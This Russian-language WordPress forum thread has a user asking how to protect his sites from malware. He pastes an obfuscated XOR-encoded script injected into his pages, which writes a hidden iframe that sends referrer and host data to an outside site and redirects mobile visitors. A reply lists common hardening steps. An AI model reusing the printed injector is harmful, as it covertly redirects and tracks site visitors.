WordPress как на ладони
Недорогой хостинг для сайтов на WordPress: wordpress.jino.ru Хостинг, VPS/VDS и отдельные сервера только на SSD дисках. 7 дней бесплатного тестирования.

Вопрос безопасности

Приветствую. Вопрос такой: как максимально обезопасить свой сайт на wordpress ?
Допустим , я использую самые надежные и проверенные плагины и дырки в плагинах мы исключим.

Даже так: как защитить стандартную сборку wordpress со стандартным шаблоном?

Очень уж вирусня одолела.

Заметки к вопросу:
Kama 3.1 года назад

А как вирусня проявляется?

Денис 3.1 года назад
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00ida,'00'02)'02'00k,k'00'02)'02'00nn'00'02)'02'00woklcv'00'02)'02'00kmlg'00'02)'02'00q,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>

вот этот код вставляется сразу после body на всех сайтах.
на компьютерах проявляется просто как пустая строчка над верхним меню сайтов
на телефонах - редирект на левый сайт какой-то.

Некоторые браузеры воспринимают сайт с этим кодом как потенциально вредоносный.

1
3.1 года назад
  • 1
    shevan219 cайт: wp-best.ru

    стандартную сборку нужно обязательно защищать, целый ряд действий

    1. изменение входа и панели администратора wp-admin
    2. изменение учетки admin, сильные пароли
    3. запрет выполнения скриптов wp-include, правильные права на каталоги
    4. изменение префикса базы данных
    5. перенос wp-config в защищенный каталог
    6. если трафик можно легко перехватить, https обязательно
    7. можно ограничить доступ к сайту по ряду географических зон
    8. обязательно все обновления wordpress(!), вот в новой версии много фиксов по безопасности, а обновляются далеко не все
      9.желательно иметь хороший антивирус на рабочем компе
    9. запретить редактирование файлов плагинов и тем из админки
    10. вообще желательно админом не пользоваться в повседневном режиме (но мало кто это делает )

    Всё это можно (и нужно!) сделать вручную, или с помощью единственного плагина wp better security, который я рекомендую, и сайт будет защищен на 90% от атак ботов и школоты.

    Можно при желании установить антивирус и файерволл на wordpress

    Денис 3.1 года назад

    Большое спасибо за развернутый ответ. Скажите, а использование плагина (для зищиты или антивируса) сильно затормозит работу сайта?

    Денис 3.1 года назад

    Еще бы пару строк на тему "Как это сделать"

    Комментировать
На вопросы могут отвечать только зарегистрированные пользователи. Вход . Регистрация